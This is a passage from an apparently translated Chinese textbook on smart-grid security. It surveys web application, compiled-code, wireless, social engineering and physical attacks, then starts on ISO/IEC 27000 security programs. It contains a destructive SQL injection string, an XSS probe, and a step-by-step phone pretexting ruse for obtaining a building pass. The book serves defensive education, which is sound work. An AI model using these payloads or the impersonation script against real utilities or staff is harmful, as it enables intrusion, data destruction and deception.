应用的数据库的管理员账号密码与智能电表界面应用数据库的管理员账户密码相 同。不幸的是,因为我们还没有从过去吸取教训,这种安全漏洞还是在困扰着IT 网络环境。 即使严格审查了公司网络与控制操作网络是隔离的,对这些应用程序的成功 攻击能广泛获取个人的身份和财政信息,这些信息可以被用于实施社会工程攻击, 或者敲诈勒索。 一旦一个人知道了顾客的账户信息即账号、当前余额和家庭住址, 那么客户可能更相信这个人从而泄露更多敏感信息。更加复杂的攻击可能是通过 冒充客户的计费代表并标记其账户欠费,致使其他公用事业公司的职员切断已有 客户的电力供应。 另外,想象一个可以远程访问公用事业公司工资单程序的攻击,可以在给定的 工资范围内操纵所有的薪水金额。这种轻微的(可能严重的)混乱使人员管理瘫痪、业务中断、公共关系不佳,以及很多其他不希望的结果。如果攻击是针对用户 支付应用并大面积的强制过度充电或是充电不足,那么很容易想象与这类似的 结果。 不论公用事业公司是选择内部开发、外包或是购买现成的业务操作 Web 应用 程序,且不论公司是什么样的内部网络结构,只要是依赖 Web 应用程序来实施业 务操作,那么与手工操作以及传统客户端-服务器应用程序相比就会引起很多新攻 击,增加风险。 2)用于智能电网操作的 Web 应用程序 对公用事业公司的企业 Web 应用程序的成功攻击是一个很严重的威胁,但是 之前也是发生过的。不一定对每个公用事业单位都有成功攻击,但是这些机构的 企业 Web 应用程序每天都被攻击,只是他们不知道或是没有向公众承认。攻击者 都对有挑战性的和新领域的攻击特别有兴趣,智能电网 Web 应用程序至少符合后 一种。关于前一种,图7.2展示了一个公用事业单位的“高级 Web 服务安全登录” 的 Web 页面,该页面不接收 HTTPS 协议,只允许 HTTP 。 如果这个例子还不够, 这里还有一个提供访问“节能计划”的Web 应用程序的例子(图7.3和7.4是抓包获取的有用的 HTML 源代码)。 截屏中删除了标识信息以保护机构的身份。这两个例子关键是要说明智能电 网行业似乎要从头开始保护安全。广泛接受的做法是通过部署传输层安全协议来 处理敏感数据和/或提供对重要功能的访问以防止网络窃听。这意味着,任何具有 网络嗅探器的人能够在公用事业公司服务区域随便逛,连接到开放的家庭网络,捕 获其认证可以用于将来攻击其客户。 第一代智能电网应用程序仅仅提供类似实时访问能量变化和消耗信息,有助 于消费者节约总能耗,并更高效地利用能源。有些应用程序的目的是让用户能远 程操作智能设备,例如恒温器。这个功能当然是由Web 应用程序提供。 在部署这些 Web 应用程序时,公用事业公司也可能被部署为一个单一故障 点。在过去又老又笨的电网中,攻击要求利用多个漏洞来旁路多层控制,并且系统 之间没有互操作。对于智能电网,其攻击则简化为单一攻击途径。过去是困难的甚至是不可能的——关灯,启动加热或是关闭一个大区域整个的电源——现在变 成了世界上所以攻击的比赛。谁能让最多的家庭断电?谁能制造最酷的灯光表 演?谁能用一排临街房屋当作“筷子游戏”玩? 所以一个攻击者如何执行这样的攻击呢?关于这部分的论述,我们将Web 应 用程序分为两个外部可访问的组件:(1)Web 服务器应用程序和(2)应用程序用户 接口。 3)攻击传统的Web 应用程序代码 在 Web 应用程序得名之前,就已经存在对它的攻击了。随着 Web 服务器应 用程序和 Web 应用程序语言及其架构变得更强大和灵活,其攻击也变得更加有力 和灵活。那么攻击者如何利用 Web 应用程序相对简单的漏洞来实施本书中描述 的攻击呢?很不幸,答案是有一种或更多种方法。 根据攻击的目标是实时的还是直接的,可以将传统 Web 应用的攻击分为两 类:客户端(Web 浏览器)或者应用程序。使用两类中的任意一类攻击都可能完成 同样的攻击目的,这也是为何攻击者对 Web 应用程序如此感兴趣的另一个原因。 特别是,针对某些应用程序用户的攻击可以导致对应用程序本身的特权访问,从而 能够访问完成目标攻击必要的功能和数据。写本专门关于应用程序漏洞、攻击和 威胁的书很容易,所以我们将从攻击方法开始讨论其最相关部分。 注意 在写这本书的时候,Web 应用程序安全行业正在从传统基于攻击的视角向更多的 基于威胁的视角转变。这种转化标志这个行业正在日趋成熟,变得与其他信息安 全行业一致。从机构的角度来看,Web 应用程序的安全目标可以更好地与通用的 业界公认的准则一致,如开放式 Web 应用安全项目( OWASP-www.owasp.org/)[6] 和 Web 应用安全联盟(WAS C-www.webappsec.org /) ] 提出的。这种基于威胁 方法的转变在OWASP 前十个项目以及WASC 的威胁分类项目中就可以看出来 了,然而将它们当前的状态与之前的以及其他信息资源相比,可看出其被广泛接受 也只是在几年以前。 尽管最终结果可能相同,这种直接目标的Web 应用程序攻击普遍认为比那种 客户端攻击更严重。这种现象表明攻击并没有完全转变为威胁。如果历史就是经 验的,那么我们可以期待这个转变在持续几年之后会有更好的东西出现。 (1)攻击方法 通用的攻击方法包括三个阶段:侦察、漏洞识别和漏洞利用。 一个攻击者在决 定下一步之前必须先知道他攻击的是什么。侦察包括分析应用程序的功能、应用 程序存储并使用的信息数据、呈现给客户端的输入数据域、以及设计与架构等方面的信息。获得越多有用的信息就越容易识别漏洞和薄弱环节、越容易成功利用 漏洞。 利用漏洞时多数情况都涉及操作客户端的数据,所以识别应用程序的漏洞是与系统有些相关的。困难之处在于识别哪个数据域应该由应用程序操作以及如何 操作。最简单的地方基本上就是一个配置设置和算法的检查列表。有特定漏洞的 应用程序很可能会容易受到相对应的攻击。举个例子,应用程序没有设置存储用 户会话标记的 Cookie 安全标志时,其会话很容易被拦截。 一旦识别了应用程序中 潜在的漏洞和薄弱环节,攻击者就可以进一步识别和验证可利用的漏洞——可能 是同时的——然后筹划攻击。 一个成功的攻击通常会重复前面提到的阶段。攻击者几乎不可能实现对应用 程序所有功能和数据的访问;如果他做到了,那么攻击几乎可以归结为从未提过的 阶段“我如何做到的?”,而不是提一下攻击者首先必须识别所有可用的功能和数 据,然后再利用各种漏洞陆续访问应用程序的更多组件就可以了。因为本书是关 于智能电网的安全,而不是关于如何攻击应用程序,有兴趣的读者可以查阅更多细 节。我们将讨论一些可以完成本章“动机”部分描述的攻击目标的重要Web 应 用 程序攻击。 (2)攻击Web 应用程序 对Web 应用程序最严重的攻击可能就是注入可执行的恶意内容。注入的内 容取决于接收注入输入的平台(SQL 数据库、操作系统、其他应用程序或服务),可 以注入应用程序代码、脚本、命令或是查询语句。不考虑平台的话,注入攻击成功 的最终结果就是执行未授权应用程序。例如,SQL 数据库注入(SQL 注入)可以提 取存储在数据表中的敏感信息,向数据库中插入新值,或是为了好玩删除一些表。 设想一下你新买的 Web 应用程序突然停止工作,应用程序的所有功能只是简单地 产生越来越多的错误日志文件内容,假设有日志文件可以查看的话,想象一下查看 这些应用程序的日志文件,在HTTP 请求中出现语句“userid=Owned’;DROP TABLE customers;-”。但愿你的备份恢复程序比应用程序的输入数据验证和数 据库查询代码更有效。 注入攻击主要是利用缺乏适当的输入数据验证、应用程序与接收平台之间的 不安全交互等漏洞。不适当的输入数据验证允许客户端提交的请求带有无效或是 不期望的数据,可能包含超出最大字符长度要求的更多字符,或者可能在注入的情 况下包含将要执行的部分命令或是系列命令,这些命令是构建应用程序代码时预 置的。攻击者提交的注入命令就会像其他正常的命令一样执行,因为对于目标平 台而言,只要命令形式是有效的就可以执行。如果命令形式无效,就会产生一个错 误,而且据说这个错误信息经常会错发到客户端。 注入攻击被认为很严重的原因是攻击的注入命令可以执行实体的特权来执 行。例如, 一个 SQL 注入查询将会以查询数据库的应用程序的特权来执行。由于 许多应用程序配置了管理员级别的权限来访问一个或更多的数据库,所以 SQL 注 入查询也可以执行管理员级别的访问,致使攻击者可以对任何数据库表执行查询 操作。但愿这个可以帮助解释为什么信息安全专家在听说应用程序是以域管理员 特权运行时表现出惊恐了。根据应用程序配置和其他因素的不同,成功的注入攻击能够导致信息泄露、未授权访问(通过提取用户凭证)或是威胁整个系统。 尽管注入攻击可能会对应用程序的安全有最大的风险,还有更多类型的攻击 可以用来达到相同的目标。由于攻击者想要获取的大部分有用功能都只有在提供 有效认证凭证之后才能访问到,所以认证组件通常就是攻击者寻找漏洞的首要目 标。对于大多数 Web 应用程序而言,几乎任意一种认证攻击都能成功。 暴力破解攻击很容易自动进行,尤其是大部分 Web 应用程序还都只要求用户 标识和密码域,几乎都没有实施一个账户锁定控制。如果一个对用户凭证的暴力 攻击不够有效, 一些 Web 应用程序可能会让你只是重设账号密码。CAPTCHA 或是其他图灵测试[8.9]本来就是用来阻止自动攻击的,但是还是有一定比率的自动 攻击成功了。另一个常用技术就是要求用户在试图重设密码或是执行其他账户管 理操作时回答一些问题,使用这项技术主要是认为攻击者不可能通过2个或3个 答案能回答出6个到12个已知问题从而自动暴力攻击。 其他类型的 Web 应用程序攻击包括操纵暴露给客户端的数据域、分析加密算 法等。根据应用程序使用数据域的方式的不同,操纵暴露给客户端的数据域的结 果会也不同。例如, 一个公用事业公司的 Web 应用程序的身份认证表单,就包括 一个隐藏的参数,当用户用真实的凭证来提交表单时,这个参数就会成为攻击目 标,如图7.5所示。这一方面的设计会被 URL 重定向利用,在成功认证之后 URL 重定向可以欺骗用户请求任意 URL 。这一类型的攻击可以利用浏览器漏洞,安装 恶意软件,或是利用认证用户的访问特权对公用事业公司的 Web 应用程序实施额 外的攻击。 这些攻击利用了Web 应用程序中的各种可能漏洞和薄弱之处,如前面描述 的,可能造成灾难性的后果。关键是有很多种漏洞和漏洞利用方式可以让攻击者 实施本书中所阐述的攻击。这些漏洞已经存在智能电网 Web 应用程序中了。 (3)攻击Web 应用程序用户 对 Web 应用程序用户的攻击也可以造成与直接攻击应用程序一样严重的后 果,这取决于用户可用的数据和功能。用户攻击最常见的类型是跨站脚本攻击 (XSS) 和跨站请求伪造(CSRF) 。 尽管这些细节可能不同,针对 Web 应用程序用 户的攻击通常会强迫用户的客户端(Web 浏览器)以用户的名义,用户的访问特权 执行一些操作,而用户自己并不知道。为此,XSS 和 CSRF 攻击能产生和注入攻击 同样的结果。 跨站脚本攻击是向Web 应用程序发送给用户的 Web 页面中注入恶意的 HT- ML,由于恶意的 HTML 与 Web 应用程序产生的HTML 很相似,所以客户端应用 程序很容将恶意HTML 误认为是自己所期望的。如前所述,XSS的负载能使客户 端执行一些不期望的行为,这个可以通过插入HTML 使客户端向应用程序发出相 关请求来实现。只要攻击者能确定发出正确请求、合适的请求顺序、请求使用恰当 的输入数据值,那么攻击者就可以像希望的那样传输 XSS负载。 判定对一特定Web 应用程序实施跨站脚本攻击是否可能的最简单和最常用的 方法,就是使接收的 Web浏览器打开一个提示弹出框,这个可以通过在请求中设置 一个“<script>alert(1)<script>” 的数据段完成。或者,部署合适的输入过滤器或 者其他防御来保护应用程序,使得攻击者攻破这层防御需要花费很多时间精力。如 果是公用事业公司 Web应用程序那就可能不会这么难了。 在用户注册过程中请求“用户账单信息”的Web 表单很容易受 到跨站脚本攻击,这个不需要访问真实的用户凭证,也就意味着任何人只要能访问 联网机器,就能使用该 Web 表单来攻击没有防范的用户的Web 浏览器,而根本不 需要首先获取对Web 应用程序的认证访问。 跨站请求伪造(CSRF) 与之前描述的第一个跨站脚本载荷非常相似,它的名字 表示了它的意思。实质上,由于客户端会自动地将用户会话身份标记附加在请求 里面,CSRF 负载可以包含一个或更多的伪造用户账户签名的请求。创建 CSRF 可利用的漏洞比较容易,较困难之处是将漏洞发送传至客户端。从公用事业公司 的角度来看,由于是在用户毫不知情的情况下强制支付额外账单、重设用户密码, 或是在每天下午4点的时候打开洗碗机,这将造成灾难性的后果。 在 XSS 攻击中有很多可用的载荷,攻击者可以收集 cookies 来得到会话标记 (假设它们存放在 cookie 中)或是通过在Web 页面中插入一个假的认证表单来收 集用户凭证,攻击者甚至能够通过使用XSS 在负载中发送一个浏览器漏洞从而完 全控制用户的操作系统。与注入攻击很相似,攻击者可以以客户端特权在用户系 统上执行任意代码。尽管用户由于其脆弱的 Web 应用程序被利用来传送 XSS 载 荷,但是当注入攻击发生时他也可能不会认为这个很有风险,不会认为用户安全与 隐私可能会受到严重损害。当然,这个攻击会直接影响用户的公共关系导致其风 险评估发生变化。 前面提到过,用一节的内容是不可能完全阐述清楚 Web应用程序攻击的。基本 上可以归结为两点:对安全漏洞进行一系列标准的测试、利用应用自定义的(可能是 唯一的)功能。标准测试包括注入测试、尝试认证攻击、分析加密算法和会话管理的 实现等。要想利用应用自定义的功能,需要详细分析预期的使用用例是如何工作的、 使用的输入数据有什么类型以及如何操纵输入数据能使其产生期望的结果(包括恶 意的或是没有企图的)。无论攻击的直接目标是应用程序还是其用户,攻击者都有很 多可以随便使用的工具和技术,可以采用很多种途径达到其终极目标。 4)攻击工具 对于Web 应用程序安全而言具有讽刺意味的是:攻击者可能不需要任何特殊 的或是昂贵的工具来实施最有力的攻击。注入攻击、暴力破解认证攻击和 XSS 攻 击有时只要通过应用程序的使用用户就能实施;也有可能只通过客户端(Web 浏 览器)就可以,因为 HTML 和 JavaScript 都必须通过 Web 浏览器翻译成人类可识 别的语言,所以攻击者直接分析并修改 Web 浏览器的代码和数据即可。 除了客户端本身,最常见的攻击工具就是Web 代理。本质上,代理能够捕获 客户端和服务器各自发送的所有请求和响应,并且允许代理拥有者按照自己期望 的方式来检查和操纵内容。在代理中整合一些额外的工具可以自动执行一些普通 任务,例如扫描未知的Web 页面、重复之前的请求、比较和对比多个请求和响应以 及系统地修改后续请求的输入数据。最后的例子是大家都知道的“fuzzing” 技术, 能有效地帮助分析应用程序,但是会耗费大量资源。 信息安全部门和专家可能最常使用的 Web 应用安全工具是自动漏洞扫描工 具。与之前的补丁和配置扫描器一样,Web 应用程序扫描器向应用程序提交请 求,并分析响应。尽管这些工具大都是基于签名的,但是有助于用户映射应用程序 并有助于识别简单漏洞。对一个Web 应用程序实施授权的安全测试时, 一般至少 用一个自动扫描器来构建应用程序映射,初步搜寻漏洞。对于我们这些在应用程 序安全行业的人而言,幸运的是,本来大部分工作都是要用我们的智慧来完成的。 很多 Web 应用安全分析工具将这些以及其他的小工具打包成一个套件提供, 从而让用户可以在不同的工具之间无缝传输数据。表7.4列出了一些当前可用的 工具套件。还有许多Web 浏览器插件(也称为“加载项”)和其他单一用途的工具, 在识别漏洞方面很有用,由于太多了这里没有列全。虽然表7.4所列的工具的有 效性在行业里还备受争议,但是还是公认为这些工具自身是一个良好的基准工 具集。 5)攻击 Web 服务器软件 随着近期 Web应用安全相关的行业炒作,尤其是之前描述的那些,很容易忽略 那些太过于寻常的 web服务器漏洞。就像操作系统支持 Web 服务器和其他的应用 程序一样,Web 服务器也支持一些自定义的 Web应用,让用户可以随手访问智能电 网。尽管这些应用是使用成熟的软件开发生命周期,并且是由许多有才能的开发者 来开发的,但是仍有一些错误(跟其他软件应用程序一样)。这就意味着,对 Web应 用程序代码的关注可能会忽略另一种重要的攻击途径,即利用Web 服务器漏洞。 目前主要是 Apache 和微软 IIS 占领着 Web 服务器软件市场,通过快速浏览 最近发布的安全补丁就可了解这些应用程序存在的已公开报道的漏洞的类型 和数量。当然,在这里公开这个词很关键,有可能只是识别出了少量漏洞而并没有 泄露。但是,鉴于这些应用程序的大小和复杂性,更可能的情况是有更多未知的或 者至少是没泄露的漏洞有待发现和利用。 攻击 Web 服务器软件和攻击自定义 web 应用代码之间有两个显著的区别。 第一个区别是有关漏洞识别的,无论是否是开源代码,与甚至是最复杂、功能最多 的 Web 应用程序相比,Web 服务器软件都有着更大的代码基,所以攻击者为了要 识别Web 服务器软件的漏洞并利用它需要进行很多繁琐单调的工作。对于非开 源代码而言,由于其代码是公众无法获知的,所以必须使用二进制分析技术,包括 代码的反汇编、反编译、调试和模糊测试。 第二个区别就是漏洞所影响的目标池,Web 应用程序的漏洞可能只能被少量的 特定Web 应用程序所利用(取决于特定的代码或脚本技术或常见的框架),而 Apache Web服务器任何支持版本的漏洞一旦被利用将影响其支持的数千万系统和 Web应 用程序。就智能电网安全而言, 一个公用事业公司的Web 应用程序的漏洞可能被用 于中断对这个公司消费者的服务,但是一个 Apache漏洞可能就会被用于中断所有公 用事业公司一半的消费者的服务,而且可能需要更多的时间和资源来解决。 7.4.3 攻击编译代码应用程序 尽管 Web 应用程序在智能电网应用程序中占了大部分,但是我们也不能忽略 攻击编译代码应用程序的重要性。实际上,我们早期就讨论过这方面了,如 Web 服务器软件,尤其是Apache 和IIS Web服务器。如前所述,识别编译代码应用程 序的漏洞更有难度,需要更多的时间、毅力以及技术等,更不用说更加昂贵的工具 了。由于 Web 应用程序很容易遭受攻击, 一些机构可能会继续使用(或是可能会 转回到)编译代码应用程序来实现一些功能。 针对编译代码这类漏洞最典型的攻击是缓冲区溢出、堆溢出以及堆栈溢出,这 类漏洞攻击通常是允许以存在该漏洞的应用程序的权限在系统上执行任意代码, 而且不会验证代码输入数据的长度及其他方面。基本上,漏洞溢出攻击能够注入 执行的新代码,更改系统的执行流,使其能执行这类未授权以及非预期的代码。这 类漏洞攻击已经存在了很长时间,2]有关更多溢出保护、相关解决办法以及新攻 击手段等方面的最近进展远远超出了本书的范围,利用Web 搜索引擎以及其他网 络资源可以为感兴趣的读者提供丰富的细节知识。 与 Web 应用程序相似,编译代码应用程序可能会碰到许多类型的安全漏洞和 安全缺陷。其他常见问题包括硬编码密码,该密码是一组简单密码,是在应用程序 开发期间设置并放置在产品中的,利用该密码,应用程序的一个组件可以访问该程 序的其他组件。 一般地,这类密码包含在客户端中(相比于瘦客户端 Web 浏览器, 通常称为胖客户端),这样是为了实现访问服务器时要求输入密码,而不需要用户 提交密码。硬编码密码是置于代码中的,可以是在注册表项中(对于Windows 应 用而言)的,也可以是在应用程序使用的数据文件中的。根据这个密码的位置以及 存储的类型的不同,通过硬编码密码获取未授权访问可能与读纯文本文件一样简 单,也可能与访问适当的注册表项、分析二进制文件一样难。 说到二进制分析,使用前面提到的一些有力的工具有助于识别这些安全问题(和其他的)。首先,反汇编和反编译可以将难以理解的执行文件转化为可以部分 理解的代码形式,尽管这种转换不能产生像应用程序开发时那样精准的、能构建可 执行文件的代码文件,但是对于其产生的代码,只要分析者具有一定技术,并赋予 足够的时间和精力,解析、分析起来还是容易得多。这种转换产生的是用于分析的 静态文件;另一种分析工具是调试器,能够允许用户在应用程序执行的时候分析应 用程序。调试时,攻击者在应用程序的任何执行点中断其执行,以分析应用程序的 当前状态,包括如硬盘、内存和寄存器等存储位置。调试器也允许攻击者操作这些 存储位置的数据值来改变当前状态,这对于试图确定应用程序处理数据的方式以 识别潜在的溢出攻击途径,以及试图确定关键数据段的存储位置以识别潜在的硬 编码密码是极为有用的。 1)攻击工具,第二轮 攻击非 Web 应用程序听起来很有吸引力,但是你需要自己建立一个工具集 (而且没有人能帮你),表7.5列出了一些公众可用的工具。类似于之前的声明,本 书不推荐任何工具,只有提供了目标应用程序的特定信息,分析目标,以及你擅长 的技术等,才能选择更加合适的特定工具。也请重新考虑事先的警告,而且程度有 所加深:这些工具只能被技术熟练的人使用。换言之,在准备开始深入这个领域之 前,得注意多学习和研究。也可以,坚持分析 Web 应用程序,多练习, 7.5 无线攻击 回顾第1章“智能电网概述”,我们讨论了几项可能会在智能电网中使用的无 线技术,尽管将来会开发并使用新的无线技术,当前广泛使用包括以下几项: ● 窄带RF, 直接序列扩频(Direct-sequence spread spectrum,DSSS),和跳频 扩频技术(Frequency-hopping spread spectrum,FHSS) ● Wi-Fi ● 蓝牙 ● 蜂窝网络 如果想要了解有关如何实施具体的无线攻击的详细信息,有几本关于无线安 全评估和攻击的书:《WarDriving and Wireless Penetrating Testing》(ISBN:978-1- 59749-111-2,Syngress),《Hacking Exposed'M Wireless Secutity Secretes &.Sol- lutions》, 还有《Seven Deadliest Wireless Technologies Attack》(ISBN:978-1- 59759-541-7,Syngress)。另外,下列NIST 准则论述了无线安全和无线测试: ● SP800-48 传统 IEEE 802.11 无线网络安全的指导书 ● SP800-97—— 构建无线的强健安全网络:IEEE 802.lli ● SP800-115——信息安全测试和评估的技术指导书 ● SP800-12C 无线网络访问认证使用的 EAP 方法的建议 ● SP800-121——蓝牙安全的指导书 ● SP800-127——微波存取全球互通技术(WiMAX:Worldwide Interopera- bility for Microware Access)安全指导书。 本节我们将在一个高层次来描述无线安全评估的组件,并提供针对智能电网 的攻击例子。 一般地,无线攻击实施流程如下: ● 发现 ● 设备分析 ● 利用 攻击者和评估组最初的目标是识别正在使用的无线技术,可以使用无线扫描 工具如 Kismet(www.kismet-wireless.net/) 以及射频频谱分析仪来确定使用的无 线技术的类型。除了这些使用的技术,对不同的无线网络、无线客户端和接入点应 该进行分类来识别流氓(未授权的)无线网络和客户端。大多数的情况,攻击者会 试图攻击公用事业公司的无线网络是为了: ● 引起拒绝服务 ● 得到敏感信息 ● 穿过边界安全控制并能够访问内部网络 智能电网组件中最有可能使用 无线技术的是智能电表及其相关的AMI/AMR 网络。智能电表利用无线技术将 其使用的数据传回公用事业公司。智能电表的数据能够被公用事业公司用来向用 户收费、调整电力需求预估、通过第三方应用程序向用户通知其使用情况等等。换 句话说,无线网络可能将用户家中的数据传输到公共事业公司的内部网络及其合 作伙伴的网络。但是,这些无线网络是最不可能直接访问公用事业公司内部网络 的。从电表出来的数据途径场网络、管理工作站才到达公用事业公司网络。所以, 对于攻击者而言,这些无线网络是他们访问公用事业公司网络的一个良好起点。 AMI 的目标之一是允许远程管理电表。如果攻击者的目标是关掉受害人的 电,那么他可以攻破公用事业公司使用的无线网络实现远程管理。 一旦攻击者攻 破了无线网络或是无线加密,他就可以用一个数据包嗅探器来窃取远程管理凭证, 并使用它们关闭受害者的电。 7.5.1 无线客户端 即使公用事业公司没有任何无线网络,攻击者还是可以对职员的笔记本电脑、 手持设备和智能设备实施客户端攻击。大多数笔记本电脑和现在出售的多数计算 机设备都有一些内部无线电,除非禁用这些无线电,否则攻击者可以直接攻击它 们。Karma(http://trailofbits.com/karma/) 就是攻击者用来攻击无线客户端的 一种工具,该工具现在作为 Karmetasploit, 是 Metaploit 的一部分。 Karmetasploit 将攻击者的笔记本电脑变成一个无线访问点,让无线客户端相 信并使用该无线访问点。大部分系统都是设置为寻找无线网络时优先之前连接过 的,这个工具就是利用这个特点,当无线客户端找到其优先连接的无线网络时, Karma 攻击者就会以该网络的身份做出响应, 一旦客户端上当,则其任何请求都会 导致其遭受恶意攻击。由于按照802.1la/b/g/n 标准的Wi-Fi 产品的广泛使用,这些无线网络能在 图7.1描述的任何智能电网领域出现。由于Wi-Fi 网络无处不在的安全问题,大多数机构不是已经禁止 Wi-Fi 网络就是有严格的政策要求无线网络不能访问企业 内部网络。有些机构不管不顾,仍然允许 Wi-Fi 网络访问其内部网络,则会导致攻 击者直接攻击这些无线网络从而旁路边界安全控制。 7.5.3 蓝 牙 蓝牙是臭名昭著的不安全的技术,已经有许多攻击都是基于该项技术的漏洞 实施的。蓝牙扫描工具能够用来发现蓝牙设备、他们的操作模式还有设备PIN 的 强度。另外,蓝牙3.0规范使用Wi-Fi 无线电来传输大量数据,所以这些设备也同 样存在于Wi-Fi一样的优势和劣势。 7.5.4 蜂窝网络 蜂窝网络曾经被认为是相对安全的无线网络;但是全球移动通讯系统(GSM) 的加密方法最近受到质疑。很多年前人们就认识到GSM 存在理论上的漏洞,但是 一直没有实际的公开攻击。但是,最近 Karsten Nohl 和 Sascha Kribler 在安全会 议上演示了对GSM 网络中的加密方法的实际攻击[13]。毋庸置疑,各类无线网络 都会有一些安全相关的弊端,这也是为什么要实施额外的安全控制的原因。 7.6 社 会 工 程 攻 击 社会工程攻击可以测试公用事业公司职员的安全意识。这种攻击会尝试诱骗 职员泄露信息,例如他们的用户名和密码,或是为攻击者提供额外的访问途径。社 会工程攻击常见的例子包括以下几点: ● 冒充 IT 服务台的职员来改变他(她)的密码 ● 冒充服务提供商(例如:碎纸机服务,备份磁盘,维修工人)来得到潜在的敏 感信息或是蓄意破坏设备 ● 在有效位置如总部外面的停车场放置USB Key,其中包含作为进入IT 基 础设施后门的恶意软件 ● 发送钓鱼邮件来从客户端职员索取敏感信息和/或IT 基础设施信息 7.6.1 选择目标 尽管偶然泄露在20世纪90年代更普遍,但在现在仍然存在。随着社交网站 的快速流行,从来没有这么容易识别目标。大多数社交网络都有关于个人工作单 位的信息,而且一些社交网站是专门针对个人职业的。在这些社交网络上搜索一 些公用事业公司的名字,很容易获取无数这些公司职员的名字及其职位。另外,自 动工具,本章“网络攻击”一节中论述自动化工具如 Maltego 和 Passive Recon,也会 帮助识别目标。 7.7 物理攻击 大多数种类的机构都在其办公室内有自己的物理设备。相反,公用事业公司 有很多输电线和智能电表是安装在客户家里及公司的。事实上,公用事业公司根 本无法阻止人为的故意切断输电线或是物理干扰智能电表。但是,公用事业公司 能够阻止以下的物理访问攻击: ● 没有访问通行证的就物理访问一些位置 ● 众目睽睽下复印或是拍摄敏感信息 ● 打探和窃听 ● 偷窃无人看管的没有上锁的移动设备(黑莓) ● 使用无人看管的没上锁的计算机 7.7.1 联合朋友攻击 强行攻击物理位置通常会涉及社会工程技术。有些时候你能找一个没有上锁 或是没有监控的门进入。但是,多数的门通常是锁着的,攻击者需要取信一个职员 让他进入, 一种大胆的实现方式是直接走向前门,从保安或接待员处获得通行证。 而为了达到该目的,攻击者比较喜欢采用的攻击手段是利用手机联合朋友一起欺 骗,我们先称该朋友名字为 John 。下面是这个攻击的步骤: (1)找出公用事业公司的一个职员,我们叫他 Bob。 (2)在你手机通信录,将你的一个朋友的名字John 改成职员的名字Bob。 (3)在去大堂之前,打电话给 John, 而你手机屏幕上会显示 Bob的名字。 (4)告诉接待员或是保安(Charlie), 你是来见 Bob的 。 (5)当 Charlie 尝试去打电话给 Bob, 告诉他们你正在用手机与 Bob 通话,把 手机交给 Charlie 来证实。 (6)你的朋友 John 会让 Charlie 相信他不能前往大堂来带领该来访者进去, 因为他得了流感或是因其他凄惨的事而待在家,但是他会说服 Charlie 给你一个通 行证并且感谢Charlie 的帮助。 即使你没能通过大堂,也可以在大堂里等很长时间。如果可能,试着选择坐在 挨着大堂电话机的位置,该电话很有可能是IP 电话。而很多 IP 电话在其电话机 内部都有一个网络交换机,可以连接小型的无线访问点。因为大多数机构没有将 语音网络与数据网络分离,无线网络接入点会允许访问其内部网络。所以,即使 Carlie 拒绝让攻击试探者通过大堂,他们只要回到停车场连接该无线访问点即可。 7.8 综合攻击 将本章的攻击分成不同的类型在逻辑上是成立的,但是,在一个真实攻击中, 攻击者不会坚持哪一类的攻击。例如,攻击者首先建立一个恶意网站,使得其URL 看起来与远程操作访问 Web 应用程序相似,并利用公用事业公司职员浏览 器的漏洞向其发送一封 email 让其访问该网站。然后,攻击者使用该职员的工作 站来获取内部网络,因为都是扁平化网络结构所以都会成功。认为扁平化网络不 再存在么?那你可以回到本章所提的“经典失败案例”看看。由于每一个系统都配 置相同的管理员密码,攻击者能够登录到用户账单数据库减少他们的月账单,导致 公用事业公司的收入损失。在这个例子中,攻击者利用了社会工程、应用程序、网 络和系统攻击来达到他(她)的目标。 这个例子的攻击是有很多前提的,例如职员访问恶意网站,不存在网络隔离, 而这也正是攻击或渗透性测试可以发现的。攻击或渗透性测试者找到一个漏洞并 且利用该漏洞来提升其访问,继而导致发现另一个漏洞来进一步增加其未授权访 问。这样会继续下去直到攻击者达到或是超过了他(她)的目标。 7.9 总结 公用事业公司不能依赖模糊不清的智能电网技术来保护自己不受到智能电网 攻击。尽管有一些技术组件会是新的,但是智能电网所采用的技术都是已存在几 十年,并且都有已知并记录的漏洞。与智能电网接触越多,攻击者和安全检测者会 更容易在电网中识别并利用漏洞。攻击可以从许多不同的位置发起,所以公用事 业公司应该对其电网执行全面的安全评估,以确定他们是否能阻止不同的攻击 途径。 安全是一个不平等的战争,安全防御者者必须保护防止任何潜在的攻击途径; 但是攻击者可能只需要找到一个漏洞来攻击。执行常规的安全评估有助于识别在 智能电网实施中的漏洞。 公用事业公司安全 8.1 智能电网安全方案 根据公用事业公司当前信息安全方案现状,可以有两种方法来进一步发展:第 一种,如果该机构已经有一个局部起作用的信息安全方案,那么就应该执行差距分 析。第二种,对于那些目前还没有有效信息安全方案的机构,就应该使其完全适应 所选择的框架。无论选用哪种方法,必须选择建立一个信息安全方案的框架。让 我们研究一下更成熟的选择。 提示 在选择标准以构建和健全信息安全方案之前,咨询高层管理人员来确定是否需要 对信息安全方案进行认证。在本章提到的两个标准中,只有ISO/IEC 27000 体系 标准能被认证。想要了解更多关于 ISO/IEC 27000 认证的信息,可以访问ISO 27001和ISO 27002常见问题(FAQ), 网址是 www.17799.com。 8.1.1ISO/IEC 27000 国际标准组织(ISO,www.iso.org/iso/home.html) 与国际电工委员会(IEC, www.iec.ch) 已经建立并发布了ISO/IEC 27000体系标准。这些标准针对“信息 技术 — 安全技术 — — 信息安全管理系统(Information Security Management System,ISMS) 。” 这些标准向机构提供了一系列国际最好的针对风险评估和控 制实施的信息安全做法。它适用于大多数机构,大或小的,盈利或非盈利的。 当前,ISO/IEC 27000体系由六个标准组成,还有一些计划附加的标准。[2]现 在发布的标准有以下: ● ISO/IEC 27000 ——信息技术——安全技术——信息安全管理系统—— 概述和词汇 ● ISO/IEC 27001 ——信息技术——安全技术——信息安全管理系统— 要求 ● ISO/IEC 27002 ——信息技术——安全技术——信息安全管理业务守则 ● ISO/IEC 27003 ——信息技术——安全技术——信息安全管理系统实施 指导 ● ISO/IEC 27004 ——信息技术——安全技术——信息安全管理——措施 ● ISO/IEC 27005 ——信息技术—安全技术——信息安全风险管理 ● ISO/IEC 27006 ——信息技术——安全技术——信息安全管理系统审计 认证要求 ● ISO/IEC 27011—— 信息技术——安全技术——基于ISO/IEC 27002 电 信组织信息安全管理指导 现在的ISO/IEC 27000 体系标准的范围很广,下面是正在准备的标准: ● ISO/IEC 27007 —— 信息技术——安全技术——信息安全管理系统审计 安全指导 ● ISO/IEC 27008 ——信息技术——安全技术——信息系统管理审计指导 ● ISO/IEC 27013 ——信息技术——安全技术——整合实施 ISO/IEC 20000-1和 ISO/IEC 27001 指导 ● ISO/IEC 27014 ——信息技术——安全技术——信息安全管理框架 ● ISO/IEC 27014 —— 信息技术——安全技术——金融和保险业信息安全 管理指导 ● 